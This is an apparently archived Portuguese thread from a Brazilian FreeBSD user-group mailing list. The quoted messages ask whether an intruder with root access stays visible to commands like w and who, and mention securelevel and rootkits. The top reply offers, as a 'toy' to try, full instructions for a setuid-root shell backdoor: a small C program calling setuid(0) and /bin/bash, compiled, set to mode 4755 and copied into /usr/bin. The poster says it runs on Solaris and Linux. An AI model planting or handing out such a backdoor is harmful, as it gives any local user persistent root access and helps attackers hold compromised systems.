Oi pessoal, Tentem isso:
vi babash.c #include <stdlib.h> main () { setuid(0); system("/bin/bash"); } /usr/local/bin/gcc babash.c -o babash chmod 4755 babash mv babash /usr/bin/babash Não me lembro quem escreveu esse brinquedo. Não fui eu pois meu conhecimento em C é pobre... Tem rodado em maquinas solaris 8, 9 e Linux... Ainda não rodei no BSD ... Abraço -----Mensagem original----- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Celso Viana Enviada em: sexta-feira, 8 de abril de 2005 10:12 Para: Lista de discussao do grupo FUG-BR Assunto: Re: [FUG-BR] segurança sim...... uso secure level 2 o cenário seria esse: tendo acabado de instalar o OS, instalei um software que tem uma falha de segurança e eu não sei disso; essa máquina está visível para o mundo (ip real); essa máquina ainda não foi atualizada; o OS está em secure level 2; minha dúvida: imaginemos que alguém, nesse momento, descobriu essa máquina e resolva explorar essa vulnerabilidade e tenha ganhado acesso root; eu, estando logado no console, posso identificar esse invasor? ele está visível para os comandos do sistema? é possível fazer com que o sistema emita um alarme qdo esse invasor consiga o acesso? Celso Celso On Apr 8, 2005 9:59 AM, Christopher Giese - IRAPIDA <[EMAIL PROTECTED]> wrote: > depende > > vc usa secure level kernel ???? > > pq se nao usa ele pode colocar um rootkit facilmente em sue sistema :) > > > Celso Viana wrote: > > >all, > > > >Se alguém consegue explorar uma vulnerabilidade num sistema FreeBSD, > >ganhando acesso root, esse alguém fica totalmente invisível? ou os > >comandos "w, who, etc" identificam o invasor? > > > >Celso > > > >_______________________________________________ > >Freebsd mailing list > >Freebsd@fug.com.br > >http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br > > > > > > _______________________________________________ > Freebsd mailing list > Freebsd@fug.com.br > http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br > _______________________________________________ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br _______________________________________________ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br